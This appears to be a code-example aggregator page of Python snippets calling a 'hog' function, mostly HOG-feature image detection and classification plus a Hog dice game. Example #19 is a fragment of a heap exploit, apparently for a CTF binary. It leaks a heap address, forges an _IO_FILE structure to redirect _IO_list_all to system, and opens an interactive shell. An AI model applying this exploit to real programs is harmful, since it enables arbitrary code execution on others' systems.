Example #1
def main():
    classifier = hog.load_classifier(filename)

    pos = [
        hog.hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(pos_path, image), 0),
                           (width, height)))) for image in os.listdir(pos_path)
    ]
    neg = [
        hog.hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(neg_path, image), 0),
                           (width, height)))) for image in os.listdir(neg_path)
    ]
    x_test = pos + neg
    y_test = [1] * len(pos) + [0] * len(neg)
    accuracy = classifier.score(x_test, y_test)
    print("Accuracy")
    print(accuracy * 100)
    positive = classifier.predict(pos)
    negative = classifier.predict(neg)
    print("Sensitivity")
    print(numpy.mean(positive) * 100)
    print("Specificity")
    print((1 - numpy.mean(negative)) * 100)
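
For reference, the three metrics printed above can also be read off a confusion matrix. A minimal sketch with sklearn, meant to sit at the end of main() and reusing the variables already defined there:

from sklearn.metrics import confusion_matrix

y_pred = classifier.predict(x_test)
tn, fp, fn, tp = confusion_matrix(y_test, y_pred).ravel()
accuracy = (tp + tn) / (tp + tn + fp + fn)
sensitivity = tp / (tp + fn)   # recall on the positive (person) class
specificity = tn / (tn + fp)   # recall on the negative class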
def _sliding_window(image,
                    model,
                    scale,
                    hog_options=HOGOptions(),
                    detection_options=DetectionOptions()):
    '''A sliding window worker method to find faces using image pyramid scales.
    Args:
        image (numpy.array): A grayscale image, as a 2-D array, to be scanned.
        model (LinearSVM): An sklearn linear SVM model with probability estimates, trained on HOG data.
        scale (float): Pyramid scale factor applied to the image.
        hog_options (HOGOptions): Defaults to HOGOptions().
        detection_options (DetectionOptions): Defaults to DetectionOptions().
    Returns:
        found_faces (list): All suspected faces.
    '''
    found_faces = list()
    # If these specific conditions are met then sliding window will not work
    if scale == 1 and image.shape == hog_options.window_size:
        window_hog = hog(image, options=hog_options)
        model_probability = model.predict_proba([window_hog])[:, 1][0]
        if model_probability >= detection_options.accept_threshold:
            found_faces.append(
                Face((0, 0), (image.shape[0] - 1, image.shape[1] - 1),
                     model_probability))
            return found_faces
    # Rescale the image to form an image pyramid.
    rescaled_image = rescale(image, 1 / scale, mode='reflect')
    # Calculate overlap pixel size from dimension average.
    overlap_amount = int(
        sum(rescaled_image.shape) * 0.5 * detection_options.overlap_percentage)
    # Go through the vertical and horizontal pixels to form a sliding window.
    for row_start in range(
            0, rescaled_image.shape[0] - hog_options.window_size[0],
            overlap_amount):
        for column_start in range(
                0, rescaled_image.shape[1] - hog_options.window_size[1],
                overlap_amount):
            row_end = row_start + hog_options.window_size[0]
            column_end = column_start + hog_options.window_size[1]
            # Crop the desired window from the image.
            window = rescaled_image[row_start:row_end, column_start:column_end]
            # Calculate the Histogram of Oriented Gradients for the desired window.
            window_hog = hog(window, options=hog_options)
            # Calculate the probability of the window containing a face.
            model_probability = model.predict_proba([window_hog])[:, 1][0]
            if model_probability >= detection_options.accept_threshold:
                # Scale the window coordinates to the full size image
                found_faces.append(
                    Face((int(row_start * scale), int(column_start * scale)),
                         (int(row_end * scale), int(column_end * scale)),
                         model_probability))
    return found_faces
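
_sliding_window is presumably driven by an outer loop that walks the image pyramid. A minimal sketch of such a driver, reusing the helpers above; detect_faces and the scale list are hypothetical names, not the project's actual API:

def detect_faces(image, model, scales=(1.0, 1.5, 2.0, 3.0),
                 hog_options=HOGOptions(),
                 detection_options=DetectionOptions()):
    # Run the sliding-window worker at every pyramid scale and pool the candidates.
    found_faces = []
    for scale in scales:
        found_faces.extend(
            _sliding_window(image, model, scale,
                            hog_options=hog_options,
                            detection_options=detection_options))
    return found_faces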
Example #3
    def __init__(self, parent, computer=False):
        """Replace hog module's dice with hooks to GUI and start a game.
        parent   -- parent widget (should be root)
        computer -- True if playing against a computer
        """

        D = 20
        N = 100
        self.h = hog(D, N)

        self.STRATEGIES = [
            self.h.strategie_aveugle(),
            self.h.strategie_toujour_lancer(3)
        ]

        super().__init__(parent)
        self.pack(fill=BOTH)
        self.parent = parent
        self.who = 0

        self.init_scores()
        self.strs()
        self.init_rolls()
        self.init_dice()
        self.init_status()
        self.init_restart()

        six_sided = self.make_dice()
        self.computer, self.turn = computer, 0
        self.play()
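
A hypothetical way to start this GUI; HogGUI is my placeholder name for the Frame subclass whose __init__ is shown above:

from tkinter import Tk

root = Tk()
app = HogGUI(root, computer=True)   # HogGUI: placeholder name for the class above
root.mainloop()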
Example #4
def get_box(rgb):
    rgb = color.rgb2gray(rgb)
    rgb = transform.rescale(rgb, 0.5)    

    model = joblib.load('../train/svm_training_data.dat')

    indices, patches = zip(*sliding_window(rgb))
    patches_hog = np.array([hog.hog(patch) for patch in patches])

    labels = model.predict(patches_hog)

    Ni, Nj = 64, 48
    indices = np.array(indices)

    boxesList = []
    
    for (i, j) in indices[labels == 1]:
        boxesList.append((j, i, j+Nj, i+Ni))

    boxesList = np.array(boxesList)
    pick = non_max_suppression_slow(boxesList, 0.3)

    if len(pick) == 0:
        return []
        
    return [(pick[0][1], pick[0][2], pick[0][3], pick[0][0])]
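
non_max_suppression_slow is not shown in this example. A minimal sketch of the greedy overlap suppression it presumably implements, modelled on the well-known "slow" NMS routine; treat it as an illustration rather than the project's actual helper:

import numpy as np

def nms_sketch(boxes, overlap_thresh):
    # boxes: (N, 4) array of (x1, y1, x2, y2); returns the boxes that survive suppression.
    if len(boxes) == 0:
        return boxes
    pick = []
    x1, y1, x2, y2 = boxes[:, 0], boxes[:, 1], boxes[:, 2], boxes[:, 3]
    area = (x2 - x1 + 1) * (y2 - y1 + 1)
    idxs = np.argsort(y2)
    while len(idxs) > 0:
        last = len(idxs) - 1
        i = idxs[last]
        pick.append(i)
        suppress = [last]
        for pos in range(last):
            j = idxs[pos]
            # Intersection of the picked box with each remaining box.
            w = max(0, min(x2[i], x2[j]) - max(x1[i], x1[j]) + 1)
            h = max(0, min(y2[i], y2[j]) - max(y1[i], y1[j]) + 1)
            # Suppress boxes whose overlap with the picked box is too large.
            if w * h / area[j] > overlap_thresh:
                suppress.append(pos)
        idxs = np.delete(idxs, suppress)
    return boxes[pick]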
Example #5
    def get_scale_sample(self, im, scaleFactors):
        """
        Extract a sample from the scale filter at the current location and scale.
        :param im: current frame
        :param scaleFactors: scale factors to sample at
        :return: matrix of HOG features, one row per scale
        """
        import cv2
        from hog import hog
        resized_im_array = np.zeros(
            (len(self.scaleFactors),
             int(
                 np.floor(self.first_target_sz[0] / 4) *
                 np.floor(self.first_target_sz[1] / 4) * 31)))
        for i, s in enumerate(scaleFactors):
            patch_sz = np.floor(self.first_target_sz * s)
            im_patch = self.get_subwindow(im, self.pos,
                                          patch_sz)  # extract image
            im_patch_resized = imresize(
                im_patch, self.first_target_sz)  #resize image to model size
            img_gray = cv2.cvtColor(im_patch_resized, cv2.COLOR_BGR2GRAY)
            features_hog, hog_image = hog(img_gray,
                                          orientations=31,
                                          pixels_per_cell=(4, 4),
                                          cells_per_block=(1, 1))
            resized_im_array[i, :] = np.multiply(features_hog.flatten(),
                                                 self.scale_window[i])

        return resized_im_array
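
For context, the scaleFactors and scale_window used above are typically built once when a DSST-style scale filter is initialised. A minimal sketch under that assumption; num_scales and scale_step are illustrative values, not taken from this project:

import numpy as np

def build_scale_space(num_scales=33, scale_step=1.02):
    # Geometric series of scale factors centred on 1.0, plus a Hann window
    # commonly used to weight the per-scale feature vectors.
    exponents = np.arange(num_scales) - (num_scales - 1) / 2.0
    scale_factors = scale_step ** exponents
    scale_window = np.hanning(num_scales)
    return scale_factors, scale_window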
Example #6
def get_hog(dir_path):
    histograms = [
        hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(dir_path, image)),
                           (width, height)))) for image in os.listdir(dir_path)
    ]
    return histograms
Example #7
    def setupUi(self, Frame, joueur=1):
        D = 10
        N = 100
        self.h = hog(D, N)

        self.result = lp_resolution(self.h.probabiltes, D, joueur)
        
        Frame.setObjectName("Frame")
        Frame.resize(750, 247)
        self.gridLayout_2 = QtWidgets.QGridLayout(Frame)
        self.gridLayout_2.setObjectName("gridLayout_2")
        self.gridLayout = QtWidgets.QGridLayout()
        self.gridLayout.setObjectName("gridLayout")
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName("verticalLayout")
        self.Text = QtWidgets.QLabel(Frame)
        self.Text.setObjectName("Text")
        self.verticalLayout.addWidget(self.Text)
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.entry_d1 = QtWidgets.QSpinBox(Frame)
        self.entry_d1.setMinimum(1)
        self.entry_d1.setObjectName("entry_d1")
        self.horizontalLayout.addWidget(self.entry_d1)
        self.button_lancer = QtWidgets.QPushButton(Frame)
        self.button_lancer.setObjectName("button_lancer")
        self.horizontalLayout.addWidget(self.button_lancer)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.d1_aff = QtWidgets.QLabel(Frame)
        self.d1_aff.setObjectName("d1_aff")
        self.horizontalLayout_2.addWidget(self.d1_aff)
        self.d2_aff = QtWidgets.QLabel(Frame)
        self.d2_aff.setObjectName("d2_aff")
        self.horizontalLayout_2.addWidget(self.d2_aff)
        self.gridLayout.addLayout(self.horizontalLayout_2, 1, 0, 1, 1)
        self.ganeur_aff = QtWidgets.QLabel(Frame)
        self.ganeur_aff.setObjectName("ganeur_aff")
        self.gridLayout.addWidget(self.ganeur_aff, 3, 0, 1, 1)
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setObjectName("horizontalLayout_3")
        self.score1_aff = QtWidgets.QLabel(Frame)
        self.score1_aff.setObjectName("score1_aff")
        self.horizontalLayout_3.addWidget(self.score1_aff)
        self.score2_aff = QtWidgets.QLabel(Frame)
        self.score2_aff.setObjectName("score2_aff")
        self.horizontalLayout_3.addWidget(self.score2_aff)
        self.gridLayout.addLayout(self.horizontalLayout_3, 2, 0, 1, 1)
        self.gridLayout_2.addLayout(self.gridLayout, 1, 0, 1, 1)
        self.Nom = QtWidgets.QLabel(Frame)
        self.Nom.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
        self.Nom.setObjectName("Nom")
        self.gridLayout_2.addWidget(self.Nom, 0, 0, 1, 1)

        self.retranslateUi(Frame)
        QtCore.QMetaObject.connectSlotsByName(Frame)
Example #8
def main():
    pos = [
        hog(numpy.float32(cv2.imread(os.path.join(pos_path, image), 0)))
        for image in os.listdir(pos_path)
    ]
    neg = [
        hog(
            numpy.float32(
                cv2.resize(cv2.imread(os.path.join(neg_path, image), 0),
                           (width, height)))) for image in os.listdir(neg_path)
    ]

    x = pos + neg
    y = [1] * len(pos) + [0] * len(neg)
    data_frame = numpy.c_[x, y]
    numpy.random.shuffle(data_frame)
    svc = train_classifier(data_frame[:, :-1], data_frame[:, -1])
    save_classifier(svc, filename)
    print('Training finished, classifier saved to file svc.pkl')
Example #9
def hog2(im):
    if not isinstance(im, Image.Image):
        im = Image.open(im)
    im = im.resize((100, 100), Image.LANCZOS).convert('RGB')
    im.save('a.jpg')
    F = hog('a.jpg')
    feat_list = []
    for fs in F:
        for f in fs:
            feat_list.append(list(f))
    return feat_list
Example #11
def main():
    classifier = hog.load_classifier(filename)
    image_name = input("Enter the name of the image file: ")
    img = cv2.imread(image_name, 0)
    img = cv2.resize(img, (width, height))
    img = numpy.float32(img)
    histogram = numpy.asarray(hog.hog(img)).reshape(1, -1)
    y = hog.predict(classifier, histogram)
    if y == 1:
        print("The image contains a person")
    elif y == 0:
        print("The image does not contain a person")
Example #12
def hog3(im):
    if not isinstance(im, Image.Image):
        im = Image.open(im)
    im = im.resize((100, 100), Image.LANCZOS).convert('RGB')
    im.save('a.jpg')
    F = hog('a.jpg')
    feat_list = []
    for i, fs in enumerate(F):
        if i % 2 == 1: continue
        for j, f in enumerate(fs):
            if j % 2 == 1: continue
            feat_list.append(list(f))
    return feat_list
Example #14
def generateHOG(input_dir, output_dir, pixels_per_cell, cells_per_block, v, n):
    filename = input_dir

    # convert to a grayscale image
    img = Image.open(filename).convert('L').resize((514, 514))
    #arr = rgb2gray(array(img))
    arr = array(img)
    #print arr.shape

    (hogarray, hogimg) = hog(arr, pixels_per_cell=pixels_per_cell,
                             cells_per_block=cells_per_block, visualise=v, normalise=n)
    #print hogimg.shape
    img = Image.fromarray(hogimg)
    img.show()
def hog_feature_vec(img):
    h, w = np.shape(img)

    m = h // 4
    n = w // 4

    feature_vec = []
    for i in range(0, h, m):
        for j in range(0, w, n):
            # hog_vector = hog_vec(img, i, j, m, n)
            hog_vec = hog.hog(img, i, j, m, n)
            feature_vec += hog_vec
    return np.array(feature_vec)
def generate_hog_data(image, hog_options=HOGOptions()):
    '''Generate Histogram of Oriented Gradients features from given image.
    Args:
        image (numpy.array): Image to calculate features from as a numpy array.
        hog_options (HOGOptions, optional): Defaults to HOGOptions(). Configuration for HOG
                                            algorithm.
    Returns:
        hog_image (numpy.array): Features of HOG data extracted from image.
    '''
    # Check if the image is correctly sized; if not, resize it. This may distort the image
    # and is not preferred.
    if image.shape != hog_options.window_size:
        print('Resizing this could potentially lead to bad data')
        image = resize(image, hog_options.window_size)
    # Calculate the Histogram of Oriented Gradients for the window with the given options.
    hog_image = hog(image, options=hog_options)
    return hog_image
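
A short usage sketch for the helper above, assuming a directory of grayscale training crops; train_dir is a hypothetical path:

import os
from skimage.io import imread

train_dir = 'training_faces'   # hypothetical directory of window-sized crops
options = HOGOptions()
features = [generate_hog_data(imread(os.path.join(train_dir, name), as_gray=True), options)
            for name in os.listdir(train_dir)]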
Example #17
def get_features(train=True):
    if train:
        # Load cifar10 train data and labels
        print("Reading training data...")
        x_data, y_data = cifar10(config.path_to_cifar, "train")
    else:
        print("Reading testing data...")
        x_data, y_data = cifar10(config.path_to_cifar, "test")

    N_data = len(x_data)

    assert x_data.shape[0] == len(
        y_data), "Both data and labels should be the same set size"

    print("Num of samples: ", N_data)
    x_data = np.array([cv2.cvtColor(x, cv2.COLOR_RGB2GRAY) for x in x_data],
                      dtype=np.float32)
    x_data /= 255.

    # Extract features
    print("Extracting HOG Features, go grab a coffee...", end=" ")
    with Timer(verbose=False) as t:
        x_data = hog(x_data)
    print("HoG extraction for train set took {} mins".format(t.mins))

    if config.min_max_norm:
        #Normalize the HOG feature vectors by rescaling the value range to [-1, 1]
        print(
            "Normalize the HOG features by rescaling the value range to [-1, 1]"
        )
        scaler = MinMaxScaler(feature_range=(-1, 1)).fit(x_data)
        x_data = scaler.transform(x_data)
    elif config.unit_vector_norm:
        #Normalize each HOG feature vector to a unit vector (length of 1)
        print("Normalize the HOG features by converting them to unit vectors")
        x_data = x_data / np.linalg.norm(x_data, axis=1, keepdims=True)

    if train:
        #Randomly shuffle the data if training.
        rand_idx = np.arange(N_data)
        np.random.shuffle(rand_idx)
        x_data = x_data[rand_idx]
        y_data = y_data[rand_idx]

    return x_data, y_data
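
A minimal usage sketch for get_features, paired with an sklearn classifier; LinearSVC is my choice here, not necessarily the project's:

from sklearn.svm import LinearSVC

x_train, y_train = get_features(train=True)
x_test, y_test = get_features(train=False)

clf = LinearSVC(C=1.0)
clf.fit(x_train, y_train)
print("Test accuracy:", clf.score(x_test, y_test))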
Example #18
    def AngMag(self, tracks, return_df=True, ho_bins=8):
        # tracks = np.array([[[100,0],[0,0],[10,10],[100,100]],[[0,0],[30,50],[5,10],[10,100]]])
        # tracks = np.array([[[0,100],[0,0],[0,0],[0,0]],[[30,200],[30,50],[0,0],[0,0]]])
        tracks = np.array([[[50, 50], [60, 50], [65, 55], [65, 65], [60, 70],
                            [50, 70], [45, 65], [45, 55], [50, 50]]])
        angles = np.full((tracks.shape[0], tracks.shape[1]), 0)
        mags = np.copy(angles)
        # print(tracks)
        # print(tracks.shape)
        hogs = np.full((tracks.shape[1], ho_bins), np.nan)
        # print(hogs.dtype)
        # nr_row = position along the track
        # nr_col = index of the track
        for nr_row in range(tracks.shape[1] - 1):
            for nr_col in range(tracks.shape[0]):
                a = tracks[nr_col, nr_row]
                b = tracks[nr_col, nr_row + 1]
                if a.any() and b.any():
                    angle = get_Angle(a, b)
                    angles[nr_col, nr_row + 1] = angle
                    mag = np.linalg.norm(np.array(a) - np.array(b))
                    mags[nr_col, nr_row + 1] = mag
            hogs[nr_row] = hog.hog(angles[:, nr_row], mags[:, nr_row], ho_bins)

        hogs = hogs[1:]
        print('hogsende: ')
        hog_norm = cv.normalize(hogs,
                                None,
                                alpha=0,
                                beta=255,
                                norm_type=cv.NORM_MINMAX,
                                dtype=cv.CV_8U).transpose(1, 0)
        hogshow = cv.applyColorMap(hog_norm, cv.COLORMAP_SUMMER)

        cv.imwrite('directions.png', hogshow)
        return hogshow
Example #19
###LEAK heap_addr
upgrade_house(1000,'a' * 16, 10, 1)
see_the_house()

p.recvuntil('a' * 16)
old_top_addr = u64(p.recv(6).ljust(8,'\x00'))
log.info('old_top_addr : ' + hex(old_top_addr))
################

###unsorted bin attack && write fake _IO_FILE
start =  old_top_addr + 0x450 + 8 * 6
log.info('fake struct start : ' + hex(start))

payload = 'a' * 0x450

payload += p64(0) ## next chunk : prev_size
payload += p64(33) ## next chunk : size
payload += p64(0x1f0000000a) ##next chunk : content
payload += p64(0) ##next chunk : content

payload += hog(libc + l.sym['_IO_list_all'], start, libc + l.sym['system'])

upgrade_house(0x1000,payload,10,1)
#####################

pause()
p.sendlineafter('Your choice : ', '1') ## trigger malloc()

p.interactive()
Example #20

negative_patches = np.vstack([
    extract_patches(im, 1000, scale) for im in images
    for scale in [0.5, 1.0, 2.0]
])

# negative_patches = np.vstack([extract_patches(im, 1, scale)
#                               for im in images for scale in [0.5, 1.0, 2.0]])

print('negative_patches retrieved')
getCurrTime()
print('Extracting HOG features')

X_train = np.array(
    [hog.hog(im) for im in chain(positive_patches, negative_patches)])

# X_train = np.array([hog.hog(im)
#                     for im in positive_patches])

y_train = np.zeros(X_train.shape[0])
y_train[:positive_patches.shape[0]] = 1

print('HOG features extracted')
getCurrTime()
print('Finding best estimator')

grid = GridSearchCV(LinearSVC(), {'C': [1.0, 2.0, 4.0, 8.0]})
grid.fit(X_train, y_train)

print('Found best estimator')
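
Once the search has run, the refit best model is normally taken straight from the grid object. A short follow-up sketch; the detector that would use it is not shown in the original:

model = grid.best_estimator_   # already refit on all of X_train (refit=True is the default)
print('Best C:', grid.best_params_['C'], 'CV score:', grid.best_score_)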
Example #21
        lst = list(map(int, line.strip('\n').split(',')))
        y.append(lst[0])
        x.append(lst[1:])
        image = []
        for i in range(28):
            i1 = 1 + i * 28
            i2 = 1 + (i + 1) * 28
            l = lst[i1:i2]
            image.append(l)
        m.append(image)
#f=hierarchical_features(m,4,2)
#'''
x_hog = []
for image in m:
    #print hog.hog(image)
    x_hog.append(hog.hog(image))
for i in range(10):
    print(x_hog[i])
x_hog = array(x_hog)
#'''
#clf=ensemble.RandomForestClassifier(n_estimators=100)
#clf=svm.SVC()
clf = svm.SVC(kernel='poly', degree=2, coef0=1)
#clf=linear_model.LogisticRegression(C=0.1,penalty='l1')
#clf=linear_model.SGDClassifier(loss="hinge", penalty="l2")
x = array(x)
y = array(y)
#f=array(f)
'''
z=[]
num=0
Example #22
def launch_learning(x):
    """
    Takes a matrix of examples X of shape NxD and returns a vector y of shape Nx1,
    where each element is in the range {0, ..., 35} and denotes the character
    recognized in the given example.
    :param x: matrix of shape NxD
    :return: vector of shape Nx1
    """
    x_train, y_train = load_training_data()

    x_train = prepare_x(x_train)
    y_train = prepare_y(y_train)
    x = prepare_x(x)

    hog_for_shape = hog.hog(x_train[0],
                            cell_size=(HOG_CELL_SIZE, HOG_CELL_SIZE),
                            cells_per_block=(HOG_CELL_BLOCK, HOG_CELL_BLOCK),
                            signed_orientation=False,
                            nbins=HOG_NBINS,
                            visualise=False,
                            normalise=True,
                            flatten=True,
                            same_size=True)

    with open(TRAIN_HOG_FILE_PATH, 'rb') as f:
        features_train = pkl.load(f)

    print('features_train after load:{}'.format(features_train))
    print('features_train after load shape:{}'.format(features_train.shape))

    if features_train.shape != (x_train.shape[0], hog_for_shape.shape[0]):
        features_train = np.empty(shape=(x_train.shape[0],
                                         hog_for_shape.shape[0]))
        print('Need to recompute features for training set')
        for i in range(x_train.shape[0]):
            features_train[i] = hog.hog(x_train[i],
                                        cell_size=(HOG_CELL_SIZE,
                                                   HOG_CELL_SIZE),
                                        cells_per_block=(HOG_CELL_BLOCK,
                                                         HOG_CELL_BLOCK),
                                        signed_orientation=False,
                                        nbins=HOG_NBINS,
                                        visualise=False,
                                        normalise=True,
                                        flatten=True,
                                        same_size=True)

        with open(TRAIN_HOG_FILE_PATH, 'wb') as pickle_file:
            pkl.dump(features_train, pickle_file)

    # these lines are necessary in the upload version; the code above will disappear, however
    # features_x = np.empty(shape=(x.shape[0], hog_for_shape.shape[0]))
    #         for i in range(x.shape[0]):
    #                 features_x[i] = hog.hog(x[i], cell_size=(HOG_CELL_SIZE, HOG_CELL_SIZE),
    #                             cells_per_block=(HOG_CELL_BLOCK, HOG_CELL_BLOCK),
    #                             signed_orientation=False, nbins=HOG_NBINS, visualise=False,
    #                             normalise=True, flatten=True, same_size=True)

    input_layer_neurons = features_train.shape[1]
    hidden_layer_neurons = NN_HIDDEN_NEURONS
    output_neurons = NUMBER_OF_LABELS
    needs_init = False
    try:
        with open(WEIGHTS_HIDDEN_PATH, 'rb') as f:
            weights_hidden = pkl.load(f)
        with open(BIASES_HIDDEN_PATH, 'rb') as f:
            biases_hidden = pkl.load(f)
        with open(WEIGHTS_OUTPUT_PATH, 'rb') as f:
            weights_output = pkl.load(f)
        with open(BIASES_OUTPUT_PATH, 'rb') as f:
            biases_output = pkl.load(f)
    except (FileNotFoundError, EOFError):
        needs_init = True

    if needs_init or weights_hidden.shape != (input_layer_neurons,
                                              hidden_layer_neurons):
        print('starting learning')

        # all connections from every feature to every node in hidden layer
        weights_hidden = np.random.uniform(size=(input_layer_neurons,
                                                 hidden_layer_neurons))
        biases_hidden = np.random.uniform(size=(1, hidden_layer_neurons))

        # all connections from every hidden_neuron to output neuron
        weights_output = np.random.uniform(size=(hidden_layer_neurons,
                                                 output_neurons))
        biases_output = np.random.uniform(size=(1, output_neurons))

    for i in range(epochs):
        print('weights hidden:{} {} {}'.format(weights_hidden[0][1],
                                               weights_hidden[0][2],
                                               weights_hidden[0][3]))
        # if using batches it will go here
        hidden_ins_w = np.dot(features_train, weights_hidden)
        hidden_layer_input = hidden_ins_w + biases_hidden
        hidden_activations = nn.sigmoid(hidden_layer_input)

        output_hidden_ins_w = np.dot(hidden_activations, weights_output)
        output_layer_input = output_hidden_ins_w + biases_output
        output = nn.sigmoid(output_layer_input)

        # back propagation
        print('starting back propagation:{}'.format(i))
        error = calc_error(output, y_train)
        slope_output_layer = nn.sigmoid_derivative(output)
        slope_hidden_layer = nn.sigmoid_derivative(hidden_activations)

        delta_output = slope_output_layer * error

        error_hidden = delta_output.dot(weights_output.T)
        delta_hidden_layer = error_hidden * slope_hidden_layer

        weights_output += hidden_activations.T.dot(
            delta_output) * LEARNING_RATE
        biases_output += np.sum(delta_output, axis=0,
                                keepdims=True) * LEARNING_RATE

        weights_hidden += features_train.T.dot(
            delta_hidden_layer) * LEARNING_RATE
        biases_hidden += np.sum(delta_hidden_layer, axis=0,
                                keepdims=True) * LEARNING_RATE

        with open(WEIGHTS_HIDDEN_PATH, 'wb') as f:
            pkl.dump(weights_hidden, f)
        with open(BIASES_HIDDEN_PATH, 'wb') as f:
            pkl.dump(biases_hidden, f)
        with open(WEIGHTS_OUTPUT_PATH, 'wb') as f:
            pkl.dump(weights_output, f)
        with open(BIASES_OUTPUT_PATH, 'wb') as f:
            pkl.dump(biases_output, f)

    return 1
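
launch_learning only trains the network; the forward pass for the input x is left commented out above. A minimal sketch of how the trained weights might be applied, mirroring the training-time forward pass (predict_labels is a hypothetical helper; nn.sigmoid and np are the modules already used in this example):

def predict_labels(features_x, weights_hidden, biases_hidden,
                   weights_output, biases_output):
    # Same two-layer sigmoid forward pass as used during training.
    hidden = nn.sigmoid(np.dot(features_x, weights_hidden) + biases_hidden)
    output = nn.sigmoid(np.dot(hidden, weights_output) + biases_output)
    # One output neuron per label; pick the most activated one for each example.
    return np.argmax(output, axis=1).reshape(-1, 1)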
    def compute_features(self, x):
        x = x.reshape(28, 28)
        return np.concatenate((hog(x, 4, num_bins=12),
                               hog(x, 7, num_bins=12),
                               hog(x, 14, num_bins=12)))
def append_data_hog(X, Y, img, class_name):
    hogdata = hog.hog(np.float32(img) / 255.0)

    X.append(np.float32(hogdata))
    Y.append(np.array([classes.index(class_name)]).astype(np.int32))
Example #25
        if (dir != DATA_DIR):
            for file in files:
                label = dir.split("/")[1]

                if (label == 'cat'):
                    label = 1
                else:
                    label = -1

                labels.append(label)

                abs_path = dir + "/" + file
                print("[INFO] Reading file : " + abs_path)

                img = cv2.imread(abs_path)
                hog_emb, grad_magnitude = hog(img)

                hog_embeddings.append(hog_emb)

    print("-----------------------------------------------------------")
    print("[INFO] Implementing Principal component analysis ... ")
    hog_embeddings = np.array(hog_embeddings)

    labels = np.array(labels)
    hog_embeddings = pca.fit_transform(hog_embeddings)

    pickle.dump(hog_embeddings, open("hog_embeddings.pickle", "wb"))
    pickle.dump(labels, open("labels.pickle", "wb"))
else:
    hog_embeddings = pickle.load(open("hog_embeddings.pickle", "rb"))
    labels = pickle.load(open("labels.pickle", "rb"))
Example #26
parser.add_argument("-i", "--image", help="test image", required=True)
parser.add_argument(
    "-p",
    "--pedestrian",
    help=
    "a pedestrian is present - add this tag if the image contains a pedestrian and omit the tag if it does not",
    action="store_true")
parser.add_argument("-w",
                    "--weights",
                    help="input file for weights (pickled)",
                    required=True)

args = parser.parse_args()

# Load image, get HOG
whole_hog = hog.hog(Image.open(args.image))
weights = None

# Open weights
with open(args.weights, 'rb') as f:
    weights = pickle.load(f)

# Use perceptron
result = perceptron.test(whole_hog, weights)

if result == args.pedestrian:
    print("Success")
else:
    print("Failure")

exit(0 if result == args.pedestrian else 1)
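
Assuming the script above is saved as test_pedestrian.py (a hypothetical name), it would be invoked along the lines of: python test_pedestrian.py --image crop.png --pedestrian --weights weights.pkl. The exit status then reports whether the perceptron's verdict matched the --pedestrian flag.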
Example #27
def main():
    # read the image and make it gray
    ap = argparse.ArgumentParser()
    ap.add_argument("-i", "--image", required=True, help="Path to the image")
    args = vars(ap.parse_args())

    image = cv2.imread(args["image"])
    height, width, channel = image.shape
    img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

    # execute LBP
    img_lbp = np.zeros((height, width, 3), np.uint8)
    for i in range(0, height):
        for j in range(0, width):
            img_lbp[i, j] = lbp(img_gray, i, j)
    hist_lbp = cv2.calcHist([img_lbp], [0], None, [256], [0, 256])
    output_list = []
    output_list.append({
        "img": img_gray,
        "xlabel": "",
        "ylabel": "",
        "xtick": [],
        "ytick": [],
        "title": "Gray Image",
        "type": "gray"
    })
    output_list.append({
        "img": img_lbp,
        "xlabel": "",
        "ylabel": "",
        "xtick": [],
        "ytick": [],
        "title": "LBP Image",
        "type": "gray"
    })
    output_list.append({
        "img": hist_lbp,
        "xlabel": "Bins",
        "ylabel": "Number of pixels",
        "xtick": None,
        "ytick": None,
        "title": "Histogram(LBP)",
        "type": "histogram"
    })

    # execute HOG
    horizontal_mask = np.array([-1, 0, 1])
    vertical_mask = np.array([[-1], [0], [1]])

    horizontal_grad = hog.calculate_gradient(img_gray, horizontal_mask)
    vertical_grad = hog.calculate_gradient(img_gray, vertical_mask)

    grad_magnitude = hog.gradient_magnitude(horizontal_grad, vertical_grad)
    grad_direction = hog.gradient_direction(horizontal_grad, vertical_grad)

    grad_direction = grad_direction % 180
    hist_bins = np.array([10, 30, 50, 70, 90, 110, 130, 150, 170])

    # histogram of the first cell in the first block
    cell_direction = grad_direction[:8, :8]
    cell_magnitude = grad_magnitude[:8, :8]
    HOG_cell_hist = hog.hog(cell_direction, cell_magnitude, hist_bins)

    # show output of descriptors
    show_output(output_list)

    plt.bar(x=np.arange(9), height=HOG_cell_hist, align="center", width=0.8)
    plt.show()

    cv2.waitKey(0)
    cv2.destroyAllWindows()
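
hog.hog above returns the 9-bin histogram for one 8x8 cell. A minimal sketch of the magnitude-weighted voting such a function typically performs (nearest-bin version for brevity; it is an illustration, not this project's exact interpolation):

import numpy as np

def cell_histogram_sketch(cell_direction, cell_magnitude, hist_bins):
    # Vote each pixel's gradient magnitude into the orientation bin whose
    # centre is closest to the pixel's gradient direction (0-180 degrees).
    hist = np.zeros(hist_bins.size)
    for direction, magnitude in zip(cell_direction.ravel(), cell_magnitude.ravel()):
        hist[np.argmin(np.abs(hist_bins - direction))] += magnitude
    return hist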
Example #29
"""
This file contains the function we used to experiment with the different strategies.
"""

from outils import *
from hog import hog
import numpy as np

D = 20
N = 100
h = hog(D, N)


def moyenne(strategie1, strategie2, name1, name2, steps=1000):
    def f1():
        score1, score2 = h.jouer(strategie1, strategie2)
        return 0 if score1 > score2 else 1

    def f2():
        score1, score2 = h.jouer(strategie1, strategie2)
        return 0 if score1 > score2 else 1

    a = np.zeros((steps)) - 1
    vfunc = np.vectorize(lambda x: f1())
    s1 = 1 - vfunc(a).sum() / steps

    r = dict()
    t = dict()
    t[name2] = s1
    r[name1] = t
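
A short usage sketch, pairing the two strategies already constructed in the GUI example above; it assumes the hog class here exposes the same strategy helpers, and that the truncated function body eventually returns r:

moyenne(h.strategie_aveugle(), h.strategie_toujour_lancer(3),
        'aveugle', 'toujours lancer 3', steps=1000)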
Example #30
data = []

# Read files
fcount = len(os.listdir(args.positive_dir)) + len(os.listdir(args.negative_dir))

try:
    with open('tmpfile', 'rb') as f:
        data = pickle.load(f)
